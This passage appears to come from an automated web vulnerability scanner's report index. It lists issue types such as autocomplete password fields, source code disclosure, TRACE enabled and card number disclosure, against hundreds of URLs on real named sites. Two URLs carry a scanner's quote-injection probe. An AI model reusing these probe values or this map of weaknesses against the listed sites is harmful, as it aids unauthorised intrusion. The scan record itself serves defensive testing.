16.199. http://www.smpone.com/Sections-read-7.html

16.200. http://www.smpone.com/Static-contact.html

16.201. http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388

16.202. http://www.tresware.com/

16.203. http://www.tresware.com/CustomPHPProgrammingNJ.html

16.204. http://www.tresware.com/Static-contact.html

16.205. http://www.tresware.com/webcontentmanagementNJ.html

17. Password field with autocomplete enabled

17.1. https://checkout.netsuite.com/s.nl

17.2. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f

17.3. https://customer.kronos.com/

17.4. https://customer.kronos.com/Default.asp

17.5. https://customer.kronos.com/user/logindenied.asp

17.6. http://direct.yandex.ru/

17.7. http://direct.yandex.ru/pages/direct/_direct-1303387947.js

17.8. https://hourly.deploy.com/hmc/report/

17.9. https://hourly.deploy.com/hmc/report/

17.10. https://hourly.deploy.com/hmc/report/

17.11. https://hourly.deploy.com/hmc/report/

17.12. https://hourly.deploy.com/hmc/report/

17.13. https://hourly.deploy.com/hmc/report/

17.14. https://hourly.deploy.com/hmc/report/

17.15. https://hourly.deploy.com/hmc/report/

17.16. https://hourly.deploy.com/hmc/report/

17.17. https://hourly.deploy.com/hmc/report/

17.18. https://hourly.deploy.com/hmc/report/

17.19. https://hourly.deploy.com/hmc/report/

17.20. https://hourly.deploy.com/hmc/report/

17.21. https://hourly.deploy.com/hmc/report/

17.22. https://hourly.deploy.com/hmc/report/

17.23. https://hourly.deploy.com/hmc/report/

17.24. https://hourly.deploy.com/hmc/report/

17.25. https://hourly.deploy.com/hmc/report/

17.26. https://hourly.deploy.com/hmc/report/

17.27. https://hourly.deploy.com/hmc/report/

17.28. https://hourly.deploy.com/hmc/report/

17.29. https://hourly.deploy.com/hmc/report/

17.30. https://hourly.deploy.com/hmc/report/

17.31. https://hourly.deploy.com/hmc/report/

17.32. https://hourly.deploy.com/hmc/report/

17.33. https://hourly.deploy.com/hmc/report/

17.34. https://hourly.deploy.com/hmc/report/

17.35. https://hourly.deploy.com/hmc/report/

17.36. https://hourly.deploy.com/hmc/report/

17.37. https://hourly.deploy.com/hmc/report/

17.38. https://hourly.deploy.com/hmc/report/

17.39. https://hourly.deploy.com/hmc/report/

17.40. https://hourly.deploy.com/hmc/report/

17.41. https://hourly.deploy.com/hmc/report/

17.42. https://hourly.deploy.com/hmc/report/

17.43. https://hourly.deploy.com/hmc/report/

17.44. https://hourly.deploy.com/hmc/report/

17.45. https://hourly.deploy.com/hmc/report/

17.46. https://hourly.deploy.com/hmc/report/

17.47. https://hourly.deploy.com/hmc/report/

17.48. https://hourly.deploy.com/hmc/report/

17.49. https://hourly.deploy.com/hmc/report/

17.50. https://hourly.deploy.com/hmc/report/

17.51. https://hourly.deploy.com/hmc/report/

17.52. https://hourly.deploy.com/hmc/report/

17.53. https://hourly.deploy.com/hmc/report/

17.54. https://hourly.deploy.com/hmc/report/

17.55. https://hourly.deploy.com/hmc/report/

17.56. https://hourly.deploy.com/hmc/report/

17.57. https://hourly.deploy.com/hmc/report/

17.58. https://hourly.deploy.com/hmc/report/

17.59. https://hourly.deploy.com/hmc/report/

17.60. https://hourly.deploy.com/hmc/report/

17.61. https://hourly.deploy.com/hmc/report/

17.62. https://hourly.deploy.com/hmc/report/

17.63. https://hourly.deploy.com/hmc/report/

17.64. https://hourly.deploy.com/hmc/report/

17.65. https://hourly.deploy.com/hmc/report/

17.66. https://hourly.deploy.com/hmc/report/

17.67. https://hourly.deploy.com/hmc/report/

17.68. https://hourly.deploy.com/hmc/report/

17.69. https://hourly.deploy.com/hmc/report/

17.70. https://hourly.deploy.com/hmc/report/

17.71. https://hourly.deploy.com/hmc/report/

17.72. https://hourly.deploy.com/hmc/report/

17.73. https://hourly.deploy.com/hmc/report/

17.74. https://hourly.deploy.com/hmc/report/

17.75. https://hourly.deploy.com/hmc/report/

17.76. https://hourly.deploy.com/hmc/report/

17.77. https://hourly.deploy.com/hmc/report/

17.78. https://hourly.deploy.com/hmc/report/

17.79. https://hourly.deploy.com/hmc/report/

17.80. https://hourly.deploy.com/hmc/report/

17.81. https://hourly.deploy.com/hmc/report/

17.82. https://hourly.deploy.com/hmc/report/

17.83. https://hourly.deploy.com/hmc/report/

17.84. https://hourly.deploy.com/hmc/report/

17.85. https://hourly.deploy.com/hmc/report/

17.86. https://hourly.deploy.com/hmc/report/

17.87. https://hourly.deploy.com/hmc/report/

17.88. https://hourly.deploy.com/hmc/report/

17.89. https://hourly.deploy.com/hmc/report/

17.90. https://hourly.deploy.com/hmc/report/

17.91. https://hourly.deploy.com/hmc/report/

17.92. https://hourly.deploy.com/hmc/report/

17.93. https://hourly.deploy.com/hmc/report/

17.94. https://hourly.deploy.com/hmc/report/

17.95. https://hourly.deploy.com/hmc/report/

17.96. https://hourly.deploy.com/hmc/report/

17.97. https://hourly.deploy.com/hmc/report/

17.98. https://hourly.deploy.com/hmc/report/

17.99. https://hourly.deploy.com/hmc/report/

17.100. https://hourly.deploy.com/hmc/report/

17.101. https://hourly.deploy.com/hmc/report/

17.102. https://hourly.deploy.com/hmc/report/

17.103. https://hourly.deploy.com/hmc/report/

17.104. https://hourly.deploy.com/hmc/report/

17.105. https://hourly.deploy.com/hmc/report/

17.106. https://hourly.deploy.com/hmc/report/

17.107. https://hourly.deploy.com/hmc/report/

17.108. https://hourly.deploy.com/hmc/report/

17.109. https://hourly.deploy.com/hmc/report/

17.110. https://hourly.deploy.com/hmc/report/

17.111. https://hourly.deploy.com/hmc/report/

17.112. https://hourly.deploy.com/hmc/report/

17.113. https://hourly.deploy.com/hmc/report/

17.114. https://hourly.deploy.com/hmc/report/

17.115. https://hourly.deploy.com/hmc/report/

17.116. https://hourly.deploy.com/hmc/report/

17.117. https://hourly.deploy.com/hmc/report/

17.118. https://hourly.deploy.com/hmc/report/

17.119. https://hourly.deploy.com/hmc/report/

17.120. https://hourly.deploy.com/hmc/report/

17.121. https://hourly.deploy.com/hmc/report/

17.122. https://hourly.deploy.com/hmc/report/

17.123. https://hourly.deploy.com/hmc/report/

17.124. https://hourly.deploy.com/hmc/report/

17.125. https://hourly.deploy.com/hmc/report/

17.126. https://hourly.deploy.com/hmc/report/

17.127. https://hourly.deploy.com/hmc/report/

17.128. https://hourly.deploy.com/hmc/report/

17.129. https://hourly.deploy.com/hmc/report/

17.130. https://hourly.deploy.com/hmc/report/

17.131. https://hourly.deploy.com/hmc/report/

17.132. https://hourly.deploy.com/hmc/report/

17.133. https://hourly.deploy.com/hmc/report/

17.134. https://hourly.deploy.com/hmc/report/

17.135. https://hourly.deploy.com/hmc/report/

17.136. https://hourly.deploy.com/hmc/report/

17.137. https://hourly.deploy.com/hmc/report/

17.138. https://hourly.deploy.com/hmc/report/

17.139. https://hourly.deploy.com/hmc/report/

17.140. https://hourly.deploy.com/hmc/report/

17.141. https://hourly.deploy.com/hmc/report/

17.142. https://hourly.deploy.com/hmc/report/

17.143. https://hourly.deploy.com/hmc/report/

17.144. https://hourly.deploy.com/hmc/report/

17.145. https://hourly.deploy.com/hmc/report/index.cfm

17.146. https://hourly.deploy.com/hmc/report/index.cfm

17.147. https://hourly.deploy.com/hmc/report/index.cfm

17.148. https://hourly.deploy.com/hmc/report/index.cfm

17.149. https://hourly.deploy.com/hmc/report/index.cfm

17.150. https://hourly.deploy.com/hmc/report/index.cfm

17.151. https://hourly.deploy.com/hmc/report/index.cfm

17.152. https://hourly.deploy.com/hmc/report/index.cfm

17.153. https://hourly.deploy.com/hmc/report/index.cfm

17.154. https://hourly.deploy.com/hmc/report/index.cfm

17.155. https://hourly.deploy.com/hmc/report/index.cfm

17.156. https://hourly.deploy.com/hmc/report/index.cfm

17.157. https://hourly.deploy.com/hmc/report/index.cfm

17.158. https://hourly.deploy.com/hmc/report/index.cfm

17.159. https://hourly.deploy.com/hmc/report/index.cfm

17.160. https://hourly.deploy.com/hmc/report/index.cfm

17.161. https://hourly.deploy.com/hmc/report/index.cfm

17.162. https://hourly.deploy.com/hmc/report/index.cfm

17.163. https://hourly.deploy.com/hmc/report/index.cfm

17.164. https://hourly.deploy.com/hmc/report/index.cfm

17.165. https://hourly.deploy.com/hmc/report/index.cfm

17.166. https://hourly.deploy.com/hmc/report/index.cfm

17.167. https://hourly.deploy.com/hmc/report/index.cfm

17.168. https://hourly.deploy.com/hmc/report/index.cfm

17.169. https://hourly.deploy.com/hmc/report/index.cfm

17.170. https://hourly.deploy.com/hmc/report/index.cfm

17.171. https://hourly.deploy.com/hmc/report/index.cfm

17.172. https://hourly.deploy.com/hmc/report/index.cfm

17.173. https://hourly.deploy.com/hmc/report/index.cfm

17.174. https://hourly.deploy.com/hmc/report/index.cfm

17.175. https://hourly.deploy.com/hmc/report/index.cfm

17.176. https://hourly.deploy.com/hmc/report/index.cfm

17.177. https://hourly.deploy.com/hmc/report/index.cfm

17.178. https://hourly.deploy.com/hmc/report/index.cfm

17.179. https://hourly.deploy.com/hmc/report/index.cfm

17.180. https://hourly.deploy.com/hmc/report/index.cfm

17.181. https://hourly.deploy.com/hmc/report/index.cfm

17.182. https://hourly.deploy.com/hmc/report/index.cfm

17.183. https://hourly.deploy.com/hmc/report/index.cfm

17.184. https://hourly.deploy.com/hmc/report/index.cfm

17.185. https://hourly.deploy.com/hmc/report/index.cfm

17.186. https://hourly.deploy.com/hmc/report/index.cfm

17.187. https://hourly.deploy.com/hmc/report/index.cfm

17.188. https://hourly.deploy.com/hmc/report/index.cfm

17.189. https://hourly.deploy.com/hmc/report/index.cfm

17.190. https://hourly.deploy.com/hmc/report/index.cfm

17.191. https://hourly.deploy.com/hmc/report/index.cfm

17.192. https://hourly.deploy.com/hmc/report/index.cfm

17.193. https://hourly.deploy.com/hmc/report/index.cfm

17.194. https://hourly.deploy.com/hmc/report/index.cfm

17.195. https://hourly.deploy.com/hmc/report/index.cfm

17.196. https://hourly.deploy.com/hmc/report/index.cfm

17.197. https://hourly.deploy.com/hmc/report/index.cfm

17.198. https://hourly.deploy.com/hmc/report/index.cfm

17.199. https://hourly.deploy.com/hmc/report/index.cfm

17.200. https://hourly.deploy.com/hmc/report/index.cfm

17.201. https://hourly.deploy.com/hmc/report/index.cfm

17.202. https://hourly.deploy.com/hmc/report/index.cfm

17.203. https://hourly.deploy.com/hmc/report/index.cfm

17.204. https://hourly.deploy.com/hmc/report/index.cfm

17.205. https://hourly.deploy.com/hmc/report/index.cfm

17.206. https://hourly.deploy.com/hmc/report/index.cfm

17.207. https://hourly.deploy.com/hmc/report/index.cfm

17.208. https://hourly.deploy.com/hmc/report/index.cfm

17.209. https://hourly.deploy.com/hmc/report/index.cfm

17.210. https://hourly.deploy.com/hmc/report/index.cfm

17.211. https://hourly.deploy.com/hmc/report/index.cfm

17.212. https://hourly.deploy.com/hmc/report/index.cfm

17.213. https://hourly.deploy.com/hmc/report/index.cfm

17.214. https://hourly.deploy.com/hmc/report/index.cfm

17.215. https://hourly.deploy.com/hmc/report/index.cfm

17.216. https://hourly.deploy.com/hmc/report/index.cfm

17.217. https://hourly.deploy.com/hmc/report/index.cfm

17.218. https://hourly.deploy.com/hmc/report/index.cfm

17.219. https://hourly.deploy.com/hmc/report/index.cfm

17.220. https://hourly.deploy.com/hmc/report/index.cfm

17.221. https://hourly.deploy.com/hmc/report/index.cfm

17.222. https://hourly.deploy.com/hmc/report/index.cfm

17.223. https://hourly.deploy.com/hmc/report/index.cfm

17.224. https://hourly.deploy.com/hmc/report/index.cfm

17.225. https://hourly.deploy.com/hmc/report/index.cfm

17.226. https://hourly.deploy.com/hmc/report/index.cfm

17.227. https://hourly.deploy.com/hmc/report/index.cfm

17.228. https://hourly.deploy.com/hmc/report/index.cfm

17.229. https://hourly.deploy.com/hmc/report/index.cfm

17.230. https://hourly.deploy.com/hmc/report/index.cfm

17.231. https://hourly.deploy.com/hmc/report/index.cfm

17.232. https://hourly.deploy.com/hmc/report/index.cfm

17.233. https://hourly.deploy.com/hmc/report/index.cfm

17.234. https://hourly.deploy.com/hmc/report/index.cfm

17.235. https://hourly.deploy.com/hmc/report/index.cfm

17.236. https://hourly.deploy.com/hmc/report/index.cfm

17.237. https://hourly.deploy.com/hmc/report/index.cfm

17.238. https://hourly.deploy.com/hmc/report/index.cfm

17.239. https://hourly.deploy.com/hmc/report/index.cfm

17.240. https://hourly.deploy.com/hmc/report/index.cfm

17.241. https://hourly.deploy.com/hmc/report/index.cfm

17.242. https://hourly.deploy.com/hmc/report/index.cfm

17.243. https://hourly.deploy.com/hmc/report/index.cfm

17.244. https://hourly.deploy.com/hmc/report/index.cfm

17.245. https://hourly.deploy.com/hmc/report/index.cfm

17.246. https://hourly.deploy.com/hmc/report/index.cfm

17.247. https://hourly.deploy.com/hmc/report/index.cfm

17.248. https://hourly.deploy.com/hmc/report/index.cfm

17.249. https://hourly.deploy.com/hmc/report/index.cfm

17.250. https://hourly.deploy.com/hmc/report/index.cfm

17.251. https://hourly.deploy.com/hmc/report/index.cfm

17.252. https://hourly.deploy.com/hmc/report/index.cfm

17.253. https://hourly.deploy.com/hmc/report/index.cfm

17.254. https://hourly.deploy.com/hmc/report/index.cfm

17.255. https://hourly.deploy.com/hmc/report/index.cfm

17.256. https://hourly.deploy.com/hmc/report/index.cfm

17.257. https://hourly.deploy.com/hmc/report/index.cfm

17.258. https://hourly.deploy.com/hmc/report/index.cfm

17.259. https://hourly.deploy.com/hmc/report/index.cfm

17.260. https://hourly.deploy.com/hmc/report/index.cfm

17.261. https://hourly.deploy.com/hmc/report/index.cfm

17.262. https://hourly.deploy.com/hmc/report/index.cfm

17.263. https://hourly.deploy.com/hmc/report/index.cfm

17.264. https://hourly.deploy.com/hmc/report/index.cfm

17.265. https://hourly.deploy.com/hmc/report/index.cfm

17.266. https://hourly.deploy.com/hmc/report/index.cfm

17.267. https://hourly.deploy.com/hmc/report/index.cfm

17.268. https://hourly.deploy.com/hmc/report/index.cfm

17.269. https://hourly.deploy.com/hmc/report/index.cfm

17.270. https://hourly.deploy.com/hmc/report/index.cfm

17.271. https://hourly.deploy.com/hmc/report/index.cfm

17.272. https://hourly.deploy.com/hmc/report/index.cfm

17.273. https://hourly.deploy.com/hmc/report/index.cfm

17.274. https://hourly.deploy.com/hmc/report/index.cfm

17.275. https://hourly.deploy.com/hmc/report/index.cfm

17.276. https://hourly.deploy.com/hmc/report/index.cfm

17.277. https://hourly.deploy.com/hmc/report/index.cfm

17.278. https://hourly.deploy.com/hmc/report/index.cfm

17.279. https://hourly.deploy.com/hmc/report/index.cfm

17.280. https://hourly.deploy.com/hmc/report/index.cfm

17.281. https://hourly.deploy.com/hmc/report/index.cfm

17.282. https://hourly.deploy.com/hmc/report/index.cfm

17.283. https://hourly.deploy.com/hmc/report/index.cfm

17.284. https://hourly.deploy.com/hmc/report/index.cfm

17.285. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

17.286. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

17.287. http://mail.ru/

17.288. http://my.webalta.ru/public/engine/templates.js

17.289. http://my.webalta.ru/public/engine/templates.js

17.290. http://odnoklassniki.ru/

17.291. http://pda.loveplanet.ru/

17.292. http://pretty.ru/

17.293. https://system.netsuite.com/pages/customerlogin.jsp

17.294. http://vkontakte.ru/

17.295. http://www.livejournal.com/

17.296. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

18. Source code disclosure

18.1. https://hourly.deploy.com/hmc/report/index.cfm

18.2. http://l-files.livejournal.net/userapps/10/image

18.3. http://www.netsuite.com/portal/javascript/NLPortal.js

19. ASP.NET debugging enabled

20. Referer-dependent response

20.1. http://pixel.fetchback.com/serve/fb/pdc

20.2. http://solutions.kronos.com/content/experience2011

20.3. http://www.eset.com/us/

20.4. http://www.eset.com/us/business/products

20.5. http://www.eset.com/us/business/server-security/linux-file

20.6. http://www.eset.com/us/home/smart-security

20.7. http://www.eset.com/us/store

20.8. http://www.facebook.com/plugins/like.php

21. Cross-domain POST

21.1. http://direct.yandex.ru/

21.2. http://nguard.com/contact.aspx

21.3. http://nguard.com/security/contact.aspx

21.4. http://odnoklassniki.ru/

21.5. http://www.eset.com/us/home/smart-security

21.6. http://www.eset.com/us/store

21.7. http://www.eset.com/us/store

21.8. http://www.eset.com/us/store

21.9. http://www.eset.com/us/store

21.10. http://www.eset.com/us/store

21.11. http://www.eset.com/us/store

22. Cross-domain Referer leakage

22.1. http://ad.amgdgt.com/ads/

22.2. http://ad.amgdgt.com/ads/

22.3. http://an.yandex.ru/code/57617

22.4. http://an.yandex.ru/code/57617

22.5. http://an.yandex.ru/code/57617

22.6. http://an.yandex.ru/code/66894

22.7. https://checkout.netsuite.com/s.nl

22.8. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f

22.9. http://direct.yandex.ru/

22.10. http://foreign.dt00.net/zones/zone25.php

22.11. http://forums.manageengine.com/fbw

22.12. http://googleads.g.doubleclick.net/pagead/ads

22.13. http://googleads.g.doubleclick.net/pagead/ads

22.14. http://googleads.g.doubleclick.net/pagead/ads

22.15. http://googleads.g.doubleclick.net/pagead/ads

22.16. http://googleads.g.doubleclick.net/pagead/ads

22.17. http://googleads.g.doubleclick.net/pagead/ads

22.18. http://googleads.g.doubleclick.net/pagead/ads

22.19. http://googleads.g.doubleclick.net/pagead/ads

22.20. http://googleads.g.doubleclick.net/pagead/ads

22.21. http://googleads.g.doubleclick.net/pagead/ads

22.22. http://googleads.g.doubleclick.net/pagead/ads

22.23. http://googleads.g.doubleclick.net/pagead/ads

22.24. http://googleads.g.doubleclick.net/pagead/ads

22.25. http://googleads.g.doubleclick.net/pagead/ads

22.26. http://googleads.g.doubleclick.net/pagead/ads

22.27. http://googleads.g.doubleclick.net/pagead/ads

22.28. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/

22.29. http://ib.adnxs.com/ab

22.30. http://ib.adnxs.com/ab

22.31. http://ideco-software.ru/products/ims/

22.32. http://js.dt00.net/public/smi/elastic/24.js

22.33. http://jsc.dt00.net/w/e/webalta.ru.1001.js

22.34. http://jsc.dt00.net/w/e/webalta.ru.1668.js

22.35. http://jsg.dt00.net/m/a/marketgid.com.i5.js

22.36. http://jsg.dt00.net/m/a/marketgid.com.i59.js

22.37. http://learn.shavlik.com/shavlik/index.cfm

22.38. http://learn.shavlik.com/shavlik/index.cfm

22.39. http://limg.imgsmail.ru/r/js/splash.js

22.40. http://nguard.com/vulnerability-assessment/

22.41. http://pixel.fetchback.com/serve/fb/pdc

22.42. http://shopping.netsuite.com/s.nl

22.43. http://storage.trafic.ro/js/trafic.js

22.44. http://tengrinews.kz/static/js/twitter.js

22.45. http://tengrinews.kz/tag/891/

22.46. http://webalta.ru/news.html

22.47. https://www.controlscan.com/checkout_invalid.php

22.48. https://www.controlscan.com/shoppingcart.php

22.49. http://www.depthsecurity.com/

22.50. http://www.eset.com/us/business/products

22.51. http://www.facebook.com/plugins/like.php

22.52. http://www.google.com/url

22.53. http://www.google.com/url

22.54. http://www.google.com/url

22.55. http://www.googleadservices.com/pagead/conversion/1072501689/

22.56. http://www.iveco-ptc.spb.ru/

22.57. http://www.manageengine.com/products/security-manager/

22.58. http://www.manageengine.com/products/security-manager/download.html

22.59. http://www.outpost24.com/

22.60. http://www.praetorian.com/external-network-penetration-test.html

22.61. http://www.smpone.com/

22.62. http://www.stillsecure.com/m/

22.63. http://www.trucklist.ru/cars/trucks

23. Cross-domain script include

23.1. http://ad.amgdgt.com/ads/

23.2. http://ad.amgdgt.com/ads/

23.3. http://auto.webalta.ru/

23.4. https://checkout.netsuite.com/s.nl

23.5. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f

23.6. http://direct.yandex.ru/

23.7. http://forums.manageengine.com/fbw

23.8. http://games.webalta.ru/

23.9. http://goods.adnectar.com/static/quantcast_1.html

23.10. http://googleads.g.doubleclick.net/pagead/ads

23.11. http://googleads.g.doubleclick.net/pagead/ads

23.12. http://googleads.g.doubleclick.net/pagead/ads

23.13. http://ideco-software.ru/products/ims/

23.14. http://learn.shavlik.com/

23.15. http://learn.shavlik.com/shavlik/N

23.16. http://learn.shavlik.com/shavlik/a

23.17. http://mail.ru/

23.18. http://nguard.com/about.aspx

23.19. http://nguard.com/contact.aspx

23.20. http://nguard.com/vulnerability-assessment/

23.21. http://odnoklassniki.ru/

23.22. http://pda.loveplanet.ru/

23.23. http://pixel.fetchback.com/serve/fb/pdc

23.24. http://pogoda.webalta.ru/

23.25. http://pretty.ru/

23.26. http://shopping.netsuite.com/s.nl

23.27. http://solutions.kronos.com/forms/experience2011

23.28. https://store.manageengine.com/service-desk/index.html

23.29. http://tengrinews.kz/tag/891/

23.30. http://webalta.ru/

23.31. http://webalta.ru/news.html

23.32. https://www.controlscan.com/

23.33. https://www.controlscan.com/checkout.php

23.34. https://www.controlscan.com/checkout_invalid.php

23.35. https://www.controlscan.com/pcicompliance.php

23.36. https://www.controlscan.com/shoppingcart.php

23.37. http://www.criticalwatch.com/company/critical-watch-career.aspx

23.38. http://www.criticalwatch.com/company/critical-watch-contact.aspx

23.39. http://www.criticalwatch.com/company/critical-watch-security.aspx

23.40. http://www.criticalwatch.com/company/management.aspx

23.41. http://www.criticalwatch.com/products/mssp.aspx

23.42. http://www.criticalwatch.com/products/vulnerability-management-ips.aspx

23.43. http://www.criticalwatch.com/products/vulnerability-management-overview.aspx

23.44. http://www.criticalwatch.com/solutions/vulnerability-management.aspx

23.45. http://www.criticalwatch.com/support/critical-watch-resource-library.aspx

23.46. http://www.criticalwatch.com/support/critical-watch-support.aspx

23.47. http://www.criticalwatch.com/support/fusionvm-technical-faq.aspx

23.48. http://www.criticalwatch.com/vulnerability-management.aspx

23.49. http://www.criticalwatch.com/vulnerability-scan-trial.aspx

23.50. http://www.eset.com/us/

23.51. http://www.eset.com/us/business/products

23.52. http://www.eset.com/us/business/server-security/linux-file

23.53. http://www.eset.com/us/home/smart-security

23.54. http://www.eset.com/us/store

23.55. http://www.eset.com/us/styles/store-new.css

23.56. http://www.facebook.com/plugins/like.php

23.57. http://www.iveco-ptc.spb.ru/

23.58. http://www.iveco-ptc.spb.ru/favicon.ico

23.59. http://www.kronos.com/about/about-kronos.aspx

23.60. http://www.livejournal.com/

23.61. http://www.manageengine.com/me_partners.html

23.62. http://www.manageengine.com/products/applications_manager/application-performance-management.html

23.63. http://www.manageengine.com/products/security-manager/

23.64. http://www.manageengine.com/products/security-manager/download.html

23.65. http://www.manageengine.com/products/security-manager/store.html

23.66. https://www.manageengine.com/network-performance-management.html

23.67. https://www.manageengine.com/products/security-manager/index.html

23.68. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

23.69. http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml

23.70. http://www.outpost24.com/

23.71. http://www.outpost24.com/products.html

23.72. http://www.stillsecure.com/company/testimonials.php

23.73. http://www.stillsecure.com/library/

23.74. http://www.stillsecure.com/m/

23.75. http://www.stillsecure.com/products.php

23.76. http://www.stillsecure.com/services/index.php

23.77. http://www.stillsecure.com/vam/

23.78. http://www.tresware.com/Static-contact.html

24. TRACE method is enabled

24.1. http://games.webalta.ru/

24.2. http://pixel.fetchback.com/

24.3. http://pixel.rubiconproject.com/

24.4. http://pl.yumenetworks.com/

24.5. https://store.manageengine.com/

24.6. http://widgets.digg.com/

24.7. http://www.igotyourindex.com/

24.8. https://www.manageengine.com/

24.9. http://www.smpone.com/

24.10. http://www.stillsecure.com/

24.11. http://www.tresware.com/

25. Email addresses disclosed

25.1. http://customer.kronos.com/EdServices/tooltip.js

25.2. http://direct.yandex.ru/

25.3. https://hourly.deploy.com/hmc/report/

25.4. https://hourly.deploy.com/hmc/report/index.cfm

25.5. http://img.en25.com/Web/KronosIncorporated/astadia-gated-forms-ver-3.js

25.6. http://l-stat.livejournal.com/js/

25.7. http://learn.shavlik.com/shavlik/

25.8. http://learn.shavlik.com/shavlik/download.cfm

25.9. http://learn.shavlik.com/shavlik/index.cfm

25.10. http://mail.ru/

25.11. http://solutions.kronos.com/forms/experience2011

25.12. http://tengrinews.kz/static/js/browserTouchSupport.js

25.13. http://tengrinews.kz/static/js/jquery.cookie.js

25.14. http://tools.manageengine.com/forums/me/forum.php

25.15. http://tools.manageengine.com/forums/security-manager/forum.php

25.16. http://www.criticalwatch.com/company/critical-watch-career.aspx

25.17. http://www.criticalwatch.com/company/critical-watch-contact.aspx

25.18. http://www.criticalwatch.com/products/vulnerability-management-ips.aspx

25.19. http://www.criticalwatch.com/support/critical-watch-support.aspx

25.20. http://www.depthsecurity.com/

25.21. http://www.depthsecurity.com/issa-kc-12-2009-presentation.aspx

25.22. https://www.depthsecurity.com/company.aspx

25.23. https://www.depthsecurity.com/contact-us.aspx

25.24. https://www.depthsecurity.com/professional-services.aspx

25.25. https://www.depthsecurity.com/services.aspx

25.26. http://www.gartner.com/technology/contact/become-a-client.jsp

25.27. http://www.gartner.com/technology/contact/contact_gartner.jsp

25.28. http://www.kronos.com/kronos-site-usage-privacy-policy.aspx

25.29. http://www.manageengine.com/me_partners.html

25.30. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

25.31. http://www.netsuite.com/portal/javascript/DD_roundies.js

25.32. http://www.praetorian.com/contactus.html

25.33. http://www.smpone.com/Static-contact.html

25.34. http://www.smpone.com/javascript/common.php

25.35. http://www.stillsecure.com/m/

25.36. http://www.tresware.com/javascript/bbcode.php

25.37. http://www.tresware.com/javascript/common.php

25.38. http://www.trucklist.ru/cars/&rnd=7005287

25.39. http://www.trucklist.ru/cars/trucks

25.40. http://www.trucklist.ru/cars/undefined

25.41. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js

26. Private IP addresses disclosed

26.1. http://api.facebook.com/restserver.php

26.2. http://games.mochiads.com/c/g/moon-volley/mvolley.swf

26.3. http://games.mochiads.com/c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf

26.4. http://games.mochiads.com/c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf

26.5. http://my.webalta.ru/public/engine/settings.js

26.6. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.7. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.8. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

26.9. http://tools.manageengine.com/forums/me/forum.php

26.10. http://tools.manageengine.com/forums/security-manager/forum.php

26.11. https://www.controlscan.com/checkout.php

26.12. http://www.facebook.com/plugins/like.php

26.13. http://www.facebook.com/plugins/like.php

26.14. http://www.facebook.com/plugins/like.php

26.15. http://www.facebook.com/plugins/like.php

26.16. http://www.facebook.com/plugins/like.php

27. Credit card numbers disclosed

27.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout

27.2. http://ib.adnxs.com/ab

27.3. http://www.kronos.com/email/c/agendalcc11-full.pdf

28. Robots.txt file

28.1. http://945075.r.msn.com/

28.2. http://ad.afy11.net/ad

28.3. http://ad.doubleclick.net/adj/lj.homepage/loggedout

28.4. http://api.facebook.com/restserver.php

28.5. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

28.6. http://b.voicefive.com/b

28.7. http://b2bcontext.ru/services/advertisement/getblock

28.8. http://beacon.securestudies.com/scripts/beacon.dll

28.9. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0

28.10. http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru

28.11. https://checkout.netsuite.com/robots.txt

28.12. http://clients1.google.com/complete/search

28.13. http://d7.zedo.com/img/bh.gif

28.14. http://direct.yandex.ru/

28.15. http://forums.manageengine.com/fbw

28.16. http://games.mochiads.com/c/g/moon-volley/mvolley.swf

28.17. http://goods.adnectar.com/analytics/get_avia_js

28.18. http://goods43.adnectar.com/analytics/record_impression

28.19. http://googleads.g.doubleclick.net/pagead/ads

28.20. http://ideco-software.ru/products/ims/

28.21. http://imagesrv.gartner.com/cio/css/main.css

28.22. http://img.en25.com/Web/KronosIncorporated/kronos-ga.js

28.23. http://map.media6degrees.com/orbserv/aopix

28.24. http://maps.google.com/maps

28.25. http://mbox5.offermatica.com/m2/netsuite/mbox/standard

28.26. http://netsuite-www.baynote.net/baynote/customerstatus2

28.27. http://odnoklassniki.ru/

28.28. http://partner-support.wiki.zoho.com/

28.29. http://pixel.fetchback.com/serve/fb/pdc

28.30. http://pixel.quantserve.com/pixel

28.31. http://pretty.ru/

28.32. http://r2.mail.ru/b13057590.swf

28.33. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif

28.34. http://rs.mail.ru/d292152.gif

28.35. http://s0.2mdn.net/1768829/GM_TS_Q3F11_BTPTsunb_300x250.swf

28.36. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGLatCCC6rQgqBbcWAgAPMgW2FgIAAQ

28.37. http://safebrowsing.clients.google.com/safebrowsing/downloads

28.38. http://search.twitter.com/search.json

28.39. http://segment-pixel.invitemedia.com/pixel

28.40. http://solutions.kronos.com/content/experience2011

28.41. http://tengrinews.kz/tag/891/

28.42. http://toolbarqueries.clients.google.com/tbproxy/af/query

28.43. http://tools.manageengine.com/forums/security-manager/forum.php

28.44. http://translate.google.com/translate_a/element.js

28.45. http://translate.googleapis.com/translate_a/t

28.46. http://widgets.digg.com/buttons/count

28.47. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

28.48. http://www.gartner.com/DisplayDocument

28.49. http://www.google-analytics.com/__utm.gif

